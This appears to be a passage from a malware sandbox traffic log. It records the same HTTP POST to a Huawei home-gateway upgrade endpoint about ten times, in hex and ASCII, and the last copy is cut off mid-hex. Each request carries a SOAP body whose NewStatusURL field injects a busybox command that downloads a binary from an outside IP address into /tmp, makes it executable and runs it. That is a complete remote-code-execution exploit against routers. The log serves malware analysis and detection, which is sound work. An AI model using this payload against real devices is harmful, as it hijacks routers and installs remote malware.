                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 